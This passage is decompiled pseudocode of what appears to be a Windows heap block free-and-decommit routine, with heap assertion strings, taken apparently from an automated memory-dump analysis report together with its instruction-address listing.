                                                				intOrPtr _t290;
                                                				signed int _t291;
                                                				signed int _t317;
                                                				signed short _t320;
                                                				intOrPtr _t327;
                                                				signed int _t339;
                                                				signed int _t344;
                                                				signed int _t347;
                                                				intOrPtr _t348;
                                                				signed int _t350;
                                                				signed int _t352;
                                                				signed int _t353;
                                                				signed int _t356;
                                                				intOrPtr _t357;
                                                				intOrPtr _t366;
                                                				signed int _t367;
                                                				signed int _t370;
                                                				intOrPtr _t371;
                                                				signed int _t372;
                                                				signed int _t394;
                                                				signed short _t402;
                                                				intOrPtr _t404;
                                                				intOrPtr _t415;
                                                				signed int _t430;
                                                				signed int _t433;
                                                				signed int _t437;
                                                				signed int _t445;
                                                				signed short _t446;
                                                				signed short _t449;
                                                				signed short _t452;
                                                				signed int _t455;
                                                				signed int _t460;
                                                				signed short* _t468;
                                                				signed int _t480;
                                                				signed int _t481;
                                                				signed int _t483;
                                                				intOrPtr _t484;
                                                				signed int _t491;
                                                				unsigned int _t506;
                                                				unsigned int _t508;
                                                				signed int _t513;
                                                				signed int _t514;
                                                				signed int _t521;
                                                				signed short* _t533;
                                                				signed int _t541;
                                                				signed int _t543;
                                                				signed int _t546;
                                                				unsigned int _t551;
                                                				signed int _t553;
                                                
                                                				_t450 = __ecx;
                                                				_t553 = __ecx;
                                                				_t539 = __edx;
                                                				_v28 = 0;
                                                				_v40 = 0;
                                                				if(( *(__ecx + 0xcc) ^  *0x14a8a68) != 0) {
                                                					_push(_a4);
                                                					_t513 = __edx;
                                                					L11:
                                                					_t246 = E013DA830(_t450, _t513);
                                                					L7:
                                                					return _t246;
                                                				}
                                                				if(_a8 != 0) {
                                                					__eflags =  *(__edx + 2) & 0x00000008;
                                                					if(( *(__edx + 2) & 0x00000008) != 0) {
                                                						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                                						_t430 = E013DDF24(__edx,  &_v12,  &_v16);
                                                						__eflags = _t430;
                                                						if(_t430 != 0) {
                                                							_t157 = _t553 + 0x234;
                                                							 *_t157 =  *(_t553 + 0x234) - _v16;
                                                							__eflags =  *_t157;
                                                						}
                                                					}
                                                					_t445 = _a4;
                                                					_t514 = _t539;
                                                					_v48 = _t539;
                                                					L14:
                                                					_t247 =  *((intOrPtr*)(_t539 + 6));
                                                					__eflags = _t247;
                                                					if(_t247 == 0) {
                                                						_t541 = _t553;
                                                					} else {
                                                						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                                						__eflags = _t541;
                                                					}
                                                					_t249 = 7 + _t445 * 8 + _t514;
                                                					_v12 = _t249;
                                                					__eflags =  *_t249 - 3;
                                                					if( *_t249 == 3) {
                                                						_v16 = _t514 + _t445 * 8 + 8;
                                                						E013B9373(_t553, _t514 + _t445 * 8 + 8);
                                                						_t452 = _v16;
                                                						_v28 =  *(_t452 + 0x10);
                                                						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                                						_v36 =  *(_t452 + 0x14);
                                                						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                                						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                                						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                                						_t256 =  *(_t452 + 0x14);
                                                						__eflags = _t256 - 0x7f000;
                                                						if(_t256 >= 0x7f000) {
                                                							_t142 = _t553 + 0x1ec;
                                                							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                                							__eflags =  *_t142;
                                                							_t256 =  *(_t452 + 0x14);
                                                						}
                                                						_t513 = _v48;
                                                						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                                						_a4 = _t445;
                                                						_v40 = 1;
                                                					} else {
                                                						_t27 =  &_v36;
                                                						 *_t27 = _v36 & 0x00000000;
                                                						__eflags =  *_t27;
                                                					}
                                                					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                                					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                                						_v44 = _t513;
                                                						_t262 = E013BA9EF(_t541, _t513);
                                                						__eflags = _a8;
                                                						_v32 = _t262;
                                                						if(_a8 != 0) {
                                                							__eflags = _t262;
                                                							if(_t262 == 0) {
                                                								goto L19;
                                                							}
                                                						}
                                                						__eflags =  *0x14a8748 - 1;
                                                						if( *0x14a8748 >= 1) {
                                                							__eflags = _t262;
                                                							if(_t262 == 0) {
                                                								_t415 =  *[fs:0x30];
                                                								__eflags =  *(_t415 + 0xc);
                                                								if( *(_t415 + 0xc) == 0) {
                                                									_push("HEAP: ");
                                                									E013BB150();
                                                								} else {
                                                									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                								}
                                                								_push("(UCRBlock != NULL)");
                                                								E013BB150();
                                                								__eflags =  *0x14a7bc8;
                                                								if( *0x14a7bc8 == 0) {
                                                									__eflags = 1;
                                                									E01472073(_t445, 1, _t541, 1);
                                                								}
                                                								_t513 = _v48;
                                                								_t445 = _a4;
                                                							}
                                                						}
                                                						_t350 = _v40;
                                                						_t480 = _t445 << 3;
                                                						_v20 = _t480;
                                                						_t481 = _t480 + _t513;
                                                						_v24 = _t481;
                                                						__eflags = _t350;
                                                						if(_t350 == 0) {
                                                							_t481 = _t481 + 0xfffffff0;
                                                							__eflags = _t481;
                                                						}
                                                						_t483 = (_t481 & 0xfffff000) - _v44;
                                                						__eflags = _t483;
                                                						_v52 = _t483;
                                                						if(_t483 == 0) {
                                                							__eflags =  *0x14a8748 - 1;
                                                							if( *0x14a8748 < 1) {
                                                								goto L9;
                                                							}
                                                							__eflags = _t350;
                                                							goto L146;
                                                						} else {
                                                							_t352 = E013E174B( &_v44,  &_v52, 0x4000);
                                                							__eflags = _t352;
                                                							if(_t352 < 0) {
                                                								goto L94;
                                                							}
                                                							_t353 = E013D7D50();
                                                							_t447 = 0x7ffe0380;
                                                							__eflags = _t353;
                                                							if(_t353 != 0) {
                                                								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                							} else {
                                                								_t356 = 0x7ffe0380;
                                                							}
                                                							__eflags =  *_t356;
                                                							if( *_t356 != 0) {
                                                								_t357 =  *[fs:0x30];
                                                								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                                								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                                									E014714FB(_t447, _t553, _v44, _v52, 5);
                                                								}
                                                							}
                                                							_t358 = _v32;
                                                							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                                							__eflags = _t484 - 0x7f000;
                                                							if(_t484 >= 0x7f000) {
                                                								_t90 = _t553 + 0x1ec;
                                                								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                                								__eflags =  *_t90;
                                                							}
                                                							E013B9373(_t553, _t358);
                                                							_t486 = _v32;
                                                							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                                							E013B9819(_t486);
                                                							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                                							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                                							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                                							__eflags = _t366 - 0x7f000;
                                                							if(_t366 >= 0x7f000) {
                                                								_t104 = _t553 + 0x1ec;
                                                								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                                								__eflags =  *_t104;
                                                							}
                                                							__eflags = _v40;
                                                							if(_v40 == 0) {
                                                								_t533 = _v52 + _v44;
                                                								_v32 = _t533;
                                                								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                								__eflags = _v24 - _v52 + _v44;
                                                								if(_v24 == _v52 + _v44) {
                                                									__eflags =  *(_t553 + 0x4c);
                                                									if( *(_t553 + 0x4c) != 0) {
                                                										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                                										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                                									}
                                                								} else {
                                                									_t449 = 0;
                                                									_t533[3] = 0;
                                                									_t533[1] = 0;
                                                									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                                									_t491 = _t394;
                                                									 *_t533 = _t394;
                                                									__eflags =  *0x14a8748 - 1; // 0x0
                                                									if(__eflags >= 0) {
                                                										__eflags = _t491 - 1;
                                                										if(_t491 <= 1) {
                                                											_t404 =  *[fs:0x30];
                                                											__eflags =  *(_t404 + 0xc);
                                                											if( *(_t404 + 0xc) == 0) {
                                                												_push("HEAP: ");
                                                												E013BB150();
                                                											} else {
                                                												E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                											}
                                                											_push("((LONG)FreeEntry->Size > 1)");
                                                											E013BB150();
                                                											_pop(_t491);
                                                											__eflags =  *0x14a7bc8 - _t449; // 0x0
                                                											if(__eflags == 0) {
                                                												__eflags = 0;
                                                												_t491 = 1;
                                                												E01472073(_t449, 1, _t541, 0);
                                                											}
                                                											_t533 = _v32;
                                                										}
                                                									}
                                                									_t533[1] = _t449;
                                                									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                                										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                                										_v16 = _t402;
                                                										__eflags = _t402 - 0xfe;
                                                										if(_t402 >= 0xfe) {
                                                											_push(_t491);
                                                											_push(_t449);
                                                											E0147A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                                											_t533 = _v48;
                                                											_t402 = _v32;
                                                										}
                                                										_t449 = _t402;
                                                									}
                                                									_t533[3] = _t449;
                                                									E013DA830(_t553, _t533,  *_t533 & 0x0000ffff);
                                                									_t447 = 0x7ffe0380;
                                                								}
                                                							}
                                                							_t367 = E013D7D50();
                                                							__eflags = _t367;
                                                							if(_t367 != 0) {
                                                								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                							} else {
                                                								_t370 = _t447;
                                                							}
                                                							__eflags =  *_t370;
                                                							if( *_t370 != 0) {
                                                								_t371 =  *[fs:0x30];
                                                								__eflags =  *(_t371 + 0x240) & 1;
                                                								if(( *(_t371 + 0x240) & 1) != 0) {
                                                									__eflags = E013D7D50();
                                                									if(__eflags != 0) {
                                                										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                									}
                                                									E01471411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                                								}
                                                							}
                                                							_t372 = E013D7D50();
                                                							_t546 = 0x7ffe038a;
                                                							_t446 = 0x230;
                                                							__eflags = _t372;
                                                							if(_t372 != 0) {
                                                								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                							} else {
                                                								_t246 = 0x7ffe038a;
                                                							}
                                                							__eflags =  *_t246;
                                                							if( *_t246 == 0) {
                                                								goto L7;
                                                							} else {
                                                								__eflags = E013D7D50();
                                                								if(__eflags != 0) {
                                                									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                                									__eflags = _t546;
                                                								}
                                                								_push( *_t546 & 0x000000ff);
                                                								_push(_v36);
                                                								_push(_v40);
                                                								goto L120;
                                                							}
                                                						}
                                                					} else {
                                                						L19:
                                                						_t31 = _t513 + 0x101f; // 0x101f
                                                						_t455 = _t31 & 0xfffff000;
                                                						_t32 = _t513 + 0x28; // 0x28
                                                						_v44 = _t455;
                                                						__eflags = _t455 - _t32;
                                                						if(_t455 == _t32) {
                                                							_t455 = _t455 + 0x1000;
                                                							_v44 = _t455;
                                                						}
                                                						_t265 = _t445 << 3;
                                                						_v24 = _t265;
                                                						_t266 = _t265 + _t513;
                                                						__eflags = _v40;
                                                						_v20 = _t266;
                                                						if(_v40 == 0) {
                                                							_t266 = _t266 + 0xfffffff0;
                                                							__eflags = _t266;
                                                						}
                                                						_t267 = _t266 & 0xfffff000;
                                                						_v52 = _t267;
                                                						__eflags = _t267 - _t455;
                                                						if(_t267 < _t455) {
                                                							__eflags =  *0x14a8748 - 1; // 0x0
                                                							if(__eflags < 0) {
                                                								L9:
                                                								_t450 = _t553;
                                                								L10:
                                                								_push(_t445);
                                                								goto L11;
                                                							}
                                                							__eflags = _v40;
                                                							L146:
                                                							if(__eflags == 0) {
                                                								goto L9;
                                                							}
                                                							_t270 =  *[fs:0x30];
                                                							__eflags =  *(_t270 + 0xc);
                                                							if( *(_t270 + 0xc) == 0) {
                                                								_push("HEAP: ");
                                                								E013BB150();
                                                							} else {
                                                								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                							}
                                                							_push("(!TrailingUCR)");
                                                							E013BB150();
                                                							__eflags =  *0x14a7bc8;
                                                							if( *0x14a7bc8 == 0) {
                                                								__eflags = 0;
                                                								E01472073(_t445, 1, _t541, 0);
                                                							}
                                                							L152:
                                                							_t445 = _a4;
                                                							L153:
                                                							_t513 = _v48;
                                                							goto L9;
                                                						}
                                                						_v32 = _t267;
                                                						_t280 = _t267 - _t455;
                                                						_v32 = _v32 - _t455;
                                                						__eflags = _a8;
                                                						_t460 = _v32;
                                                						_v52 = _t460;
                                                						if(_a8 != 0) {
                                                							L27:
                                                							__eflags = _t280;
                                                							if(_t280 == 0) {
                                                								L33:
                                                								_t446 = 0;
                                                								__eflags = _v40;
                                                								if(_v40 == 0) {
                                                									_t468 = _v44 + _v52;
                                                									_v36 = _t468;
                                                									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                									__eflags = _v20 - _v52 + _v44;
                                                									if(_v20 == _v52 + _v44) {
                                                										__eflags =  *(_t553 + 0x4c);
                                                										if( *(_t553 + 0x4c) != 0) {
                                                											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                                											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                                										}
                                                									} else {
                                                										_t468[3] = 0;
                                                										_t468[1] = 0;
                                                										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                                										_t521 = _t317;
                                                										 *_t468 = _t317;
                                                										__eflags =  *0x14a8748 - 1; // 0x0
                                                										if(__eflags >= 0) {
                                                											__eflags = _t521 - 1;
                                                											if(_t521 <= 1) {
                                                												_t327 =  *[fs:0x30];
                                                												__eflags =  *(_t327 + 0xc);
                                                												if( *(_t327 + 0xc) == 0) {
                                                													_push("HEAP: ");
                                                													E013BB150();
                                                												} else {
                                                													E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                												}
                                                												_push("(LONG)FreeEntry->Size > 1");
                                                												E013BB150();
                                                												__eflags =  *0x14a7bc8 - _t446; // 0x0
                                                												if(__eflags == 0) {
                                                													__eflags = 1;
                                                													E01472073(_t446, 1, _t541, 1);
                                                												}
                                                												_t468 = _v36;
                                                											}
                                                										}
                                                										_t468[1] = _t446;
                                                										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                                										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                                											_t320 = _t446;
                                                										} else {
                                                											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                                											_v12 = _t320;
                                                											__eflags = _t320 - 0xfe;
                                                											if(_t320 >= 0xfe) {
                                                												_push(_t468);
                                                												_push(_t446);
                                                												E0147A80D(_t522, 3, _t468, _t541);
                                                												_t468 = _v52;
                                                												_t320 = _v28;
                                                											}
                                                										}
                                                										_t468[3] = _t320;
                                                										E013DA830(_t553, _t468,  *_t468 & 0x0000ffff);
                                                									}
                                                								}
                                                								E013DB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                                								E013DA830(_t553, _v64, _v24);
                                                								_t286 = E013D7D50();
                                                								_t542 = 0x7ffe0380;
                                                								__eflags = _t286;
                                                								if(_t286 != 0) {
                                                									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                								} else {
                                                									_t289 = 0x7ffe0380;
                                                								}
                                                								__eflags =  *_t289;
                                                								if( *_t289 != 0) {
                                                									_t290 =  *[fs:0x30];
                                                									__eflags =  *(_t290 + 0x240) & 1;
                                                									if(( *(_t290 + 0x240) & 1) != 0) {
                                                										__eflags = E013D7D50();
                                                										if(__eflags != 0) {
                                                											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                										}
                                                										E01471411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                                									}
                                                								}
                                                								_t291 = E013D7D50();
                                                								_t543 = 0x7ffe038a;
                                                								__eflags = _t291;
                                                								if(_t291 != 0) {
                                                									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                								} else {
                                                									_t246 = 0x7ffe038a;
                                                								}
                                                								__eflags =  *_t246;
                                                								if( *_t246 != 0) {
                                                									__eflags = E013D7D50();
                                                									if(__eflags != 0) {
                                                										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                										__eflags = _t543;
                                                									}
                                                									_push( *_t543 & 0x000000ff);
                                                									_push(_t446);
                                                									_push(_t446);
                                                									L120:
                                                									_push( *(_t553 + 0x74) << 3);
                                                									_push(_v52);
                                                									_t246 = E01471411(_t446, _t553, _v44, __eflags);
                                                								}
                                                								goto L7;
                                                							}
                                                							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                							_t339 = E013E174B( &_v44,  &_v52, 0x4000);
                                                							__eflags = _t339;
                                                							if(_t339 < 0) {
                                                								L94:
                                                								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                                								__eflags = _v40;
                                                								if(_v40 == 0) {
                                                									goto L153;
                                                								}
                                                								E013DB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                                								goto L152;
                                                							}
                                                							_t344 = E013D7D50();
                                                							__eflags = _t344;
                                                							if(_t344 != 0) {
                                                								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                							} else {
                                                								_t347 = 0x7ffe0380;
                                                							}
                                                							__eflags =  *_t347;
                                                							if( *_t347 != 0) {
                                                								_t348 =  *[fs:0x30];
                                                								__eflags =  *(_t348 + 0x240) & 1;
                                                								if(( *(_t348 + 0x240) & 1) != 0) {
                                                									E014714FB(_t445, _t553, _v44, _v52, 6);
                                                								}
                                                							}
                                                							_t513 = _v48;
                                                							goto L33;
                                                						}
                                                						__eflags =  *_v12 - 3;
                                                						_t513 = _v48;
                                                						if( *_v12 == 3) {
                                                							goto L27;
                                                						}
                                                						__eflags = _t460;
                                                						if(_t460 == 0) {
                                                							goto L9;
                                                						}
                                                						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                                						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                                							goto L9;
                                                						}
                                                						goto L27;
                                                					}
                                                				}
                                                				_t445 = _a4;
                                                				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                                					_t513 = __edx;
                                                					goto L10;
                                                				}
                                                				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                                				_v20 = _t433;
                                                				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                                					_t513 = _t539;
                                                					goto L9;
                                                				} else {
                                                					_t437 = E013D99BF(__ecx, __edx,  &_a4, 0);
                                                					_t445 = _a4;
                                                					_t514 = _t437;
                                                					_v56 = _t514;
                                                					if(_t445 - 0x201 > 0xfbff) {
                                                						goto L14;
                                                					} else {
                                                						E013DA830(__ecx, _t514, _t445);
                                                						_t506 =  *(_t553 + 0x238);
                                                						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                                						_t246 = _t506 >> 4;
                                                						if(_t551 < _t506 - _t246) {
                                                							_t508 =  *(_t553 + 0x23c);
                                                							_t246 = _t508 >> 2;
                                                							__eflags = _t551 - _t508 - _t246;
                                                							if(_t551 > _t508 - _t246) {
                                                								_t246 = E013EABD8(_t553);
                                                								 *(_t553 + 0x23c) = _t551;
                                                								 *(_t553 + 0x238) = _t551;
                                                							}
                                                						}
                                                						goto L7;
                                                					}
                                                				}
                                                			}

                                                0x013da676
                                                0x013da67b
                                                0x013da680
                                                0x013da682
                                                0x01421f1a
                                                0x013da688
                                                0x013da688
                                                0x013da688
                                                0x013da68a
                                                0x013da68d
                                                0x01421f24
                                                0x01421f2a
                                                0x01421f31
                                                0x01421f43
                                                0x01421f43
                                                0x01421f31
                                                0x013da693
                                                0x013da697
                                                0x013da69d
                                                0x013da6a0
                                                0x013da6a6
                                                0x013da6a8
                                                0x013da6a8
                                                0x013da6a8
                                                0x013da6a8
                                                0x013da6b2
                                                0x013da6b7
                                                0x013da6c1
                                                0x013da6c6
                                                0x013da6d2
                                                0x013da6d9
                                                0x013da6e3
                                                0x013da6e6
                                                0x013da6eb
                                                0x013da6ed
                                                0x013da6ed
                                                0x013da6ed
                                                0x013da6ed
                                                0x013da6f3
                                                0x013da6f8
                                                0x013da702
                                                0x013da70a
                                                0x013da70e
                                                0x013da71a
                                                0x013da71e
                                                0x01421fcb
                                                0x01421fcf
                                                0x01421fdd
                                                0x01421fe3
                                                0x01421fe3
                                                0x013da724
                                                0x013da728
                                                0x013da72a
                                                0x013da72d
                                                0x013da737
                                                0x013da73a
                                                0x013da73c
                                                0x013da742
                                                0x013da748
                                                0x01421f4d
                                                0x01421f50
                                                0x01421f56
                                                0x01421f5c
                                                0x01421f5f
                                                0x01421f7e
                                                0x01421f83
                                                0x01421f61
                                                0x01421f76
                                                0x01421f7b
                                                0x01421f89
                                                0x01421f8e
                                                0x01421f93
                                                0x01421f94
                                                0x01421f9a
                                                0x01421f9c
                                                0x01421f9e
                                                0x01421fa1
                                                0x01421fa1
                                                0x01421fa6
                                                0x01421fa6
                                                0x01421f50
                                                0x013da74e
                                                0x013da751
                                                0x013da754
                                                0x013da75d
                                                0x013da75e
                                                0x013da762
                                                0x013da767
                                                0x01421faf
                                                0x01421fb0
                                                0x01421fb9
                                                0x01421fbe
                                                0x01421fc2
                                                0x01421fc2
                                                0x013da76d
                                                0x013da76d
                                                0x013da775
                                                0x013da778
                                                0x013da77d
                                                0x013da77d
                                                0x013da71e
                                                0x013da782
                                                0x013da787
                                                0x013da789
                                                0x01421ff3
                                                0x013da78f
                                                0x013da78f
                                                0x013da78f
                                                0x013da791
                                                0x013da794
                                                0x01421ffd
                                                0x01422006
                                                0x0142200c
                                                0x01422017
                                                0x01422019
                                                0x01422024
                                                0x01422024
                                                0x01422024
                                                0x01422047
                                                0x01422047
                                                0x0142200c
                                                0x013da79a
                                                0x013da79f
                                                0x013da7a4
                                                0x013da7a9
                                                0x013da7ab
                                                0x0142205a
                                                0x013da7b1
                                                0x013da7b1
                                                0x013da7b1
                                                0x013da7b3
                                                0x013da7b6
                                                0x00000000
                                                0x013da7bc
                                                0x01422066
                                                0x01422068
                                                0x01422073
                                                0x01422073
                                                0x01422073
                                                0x01422078
                                                0x01422079
                                                0x0142207d
                                                0x00000000
                                                0x0142207d
                                                0x013da7b6
                                                0x013da440
                                                0x013da440
                                                0x013da440
                                                0x013da446
                                                0x013da44c
                                                0x013da44f
                                                0x013da453
                                                0x013da455
                                                0x014220b3
                                                0x014220b9
                                                0x014220b9
                                                0x013da45d
                                                0x013da460
                                                0x013da464
                                                0x013da466
                                                0x013da46b
                                                0x013da46f
                                                0x013da471
                                                0x013da471
                                                0x013da471
                                                0x013da474
                                                0x013da479
                                                0x013da47d
                                                0x013da47f
                                                0x01422229
                                                0x0142222f
                                                0x013da3c8
                                                0x013da3c8
                                                0x013da3ca
                                                0x013da3ca
                                                0x00000000
                                                0x013da3ca
                                                0x01422235
                                                0x0142223a
                                                0x0142223a
                                                0x00000000
                                                0x00000000
                                                0x01422240
                                                0x01422246
                                                0x0142224a
                                                0x01422269
                                                0x0142226e
                                                0x0142224c
                                                0x01422261
                                                0x01422266
                                                0x01422274
                                                0x01422279
                                                0x0142227e
                                                0x01422286
                                                0x01422288
                                                0x0142228d
                                                0x0142228d
                                                0x01422292
                                                0x01422292
                                                0x01422295
                                                0x01422295
                                                0x00000000
                                                0x01422295
                                                0x013da485
                                                0x013da489
                                                0x013da48b
                                                0x013da48f
                                                0x013da493
                                                0x013da497
                                                0x013da49b
                                                0x013da4bb
                                                0x013da4bb
                                                0x013da4bd
                                                0x013da4ff
                                                0x013da4ff
                                                0x013da501
                                                0x013da505
                                                0x013da50f
                                                0x013da517
                                                0x013da51b
                                                0x013da527
                                                0x013da52b
                                                0x01422182
                                                0x01422185
                                                0x01422193
                                                0x01422199
                                                0x01422199
                                                0x013da531
                                                0x013da535
                                                0x013da538
                                                0x013da548
                                                0x013da54b
                                                0x013da54d
                                                0x013da553
                                                0x013da559
                                                0x01422100
                                                0x01422103
                                                0x01422109
                                                0x0142210f
                                                0x01422112
                                                0x01422131
                                                0x01422136
                                                0x01422114
                                                0x01422129
                                                0x0142212e
                                                0x0142213c
                                                0x01422141
                                                0x01422147
                                                0x0142214d
                                                0x01422151
                                                0x01422154
                                                0x01422154
                                                0x01422159
                                                0x01422159
                                                0x01422103
                                                0x013da55f
                                                0x013da562
                                                0x013da565
                                                0x013da567
                                                0x01422162
                                                0x013da56d
                                                0x013da574
                                                0x013da575
                                                0x013da579
                                                0x013da57e
                                                0x01422169
                                                0x0142216a
                                                0x01422170
                                                0x01422175
                                                0x01422179
                                                0x01422179
                                                0x013da57e
                                                0x013da584
                                                0x013da58f
                                                0x013da58f
                                                0x013da52b
                                                0x013da5ad
                                                0x013da5bc
                                                0x013da5c1
                                                0x013da5c6
                                                0x013da5cb
                                                0x013da5cd
                                                0x014221a9
                                                0x013da5d3
                                                0x013da5d3
                                                0x013da5d3
                                                0x013da5d5
                                                0x013da5d8
                                                0x014221b3
                                                0x014221bc
                                                0x014221c2
                                                0x014221cd
                                                0x014221cf
                                                0x014221da
                                                0x014221da
                                                0x014221da
                                                0x014221f7
                                                0x014221f7
                                                0x014221c2
                                                0x013da5de
                                                0x013da5e3
                                                0x013da5e8
                                                0x013da5ea
                                                0x0142220a
                                                0x013da5f0
                                                0x013da5f0
                                                0x013da5f0
                                                0x013da5f2
                                                0x013da5f5
                                                0x01422219
                                                0x0142221b
                                                0x0142208c
                                                0x0142208c
                                                0x0142208c
                                                0x01422095
                                                0x01422096
                                                0x01422097
                                                0x01422098
                                                0x014220a4
                                                0x014220a5
                                                0x014220a9
                                                0x014220a9
                                                0x00000000
                                                0x013da5f5
                                                0x013da4bf
                                                0x013da4d3
                                                0x013da4d8
                                                0x013da4da
                                                0x01421ede
                                                0x01421ede
                                                0x01421ee4
                                                0x01421ee9
                                                0x00000000
                                                0x00000000
                                                0x01421f07
                                                0x00000000
                                                0x01421f07
                                                0x013da4e0
                                                0x013da4e5
                                                0x013da4e7
                                                0x014220cb
                                                0x013da4ed
                                                0x013da4ed
                                                0x013da4ed
                                                0x013da4f2
                                                0x013da4f5
                                                0x014220d5
                                                0x014220de
                                                0x014220e4
                                                0x014220f6
                                                0x014220f6
                                                0x014220e4
                                                0x013da4fb
                                                0x00000000
                                                0x013da4fb
                                                0x013da4a1
                                                0x013da4a4
                                                0x013da4a8
                                                0x00000000
                                                0x00000000
                                                0x013da4aa
                                                0x013da4ac
                                                0x00000000
                                                0x00000000
                                                0x013da4b2
                                                0x013da4b5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013da4b5
                                                0x013da43a
                                                0x013da340
                                                0x013da346
                                                0x013da600
                                                0x00000000
                                                0x013da600
                                                0x013da34f
                                                0x013da351
                                                0x013da358
                                                0x013da3c6
                                                0x00000000
                                                0x013da371
                                                0x013da37a
                                                0x013da37f
                                                0x013da382
                                                0x013da384
                                                0x013da394
                                                0x00000000
                                                0x013da396
                                                0x013da399
                                                0x013da3a7
                                                0x013da3b0
                                                0x013da3b4
                                                0x013da3bb
                                                0x013da3d2
                                                0x013da3da
                                                0x013da3df
                                                0x013da3e1
                                                0x013da3e5
                                                0x013da3ea
                                                0x013da3f0
                                                0x013da3f0
                                                0x013da3e1
                                                0x00000000
                                                0x013da3bb
                                                0x013da394

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
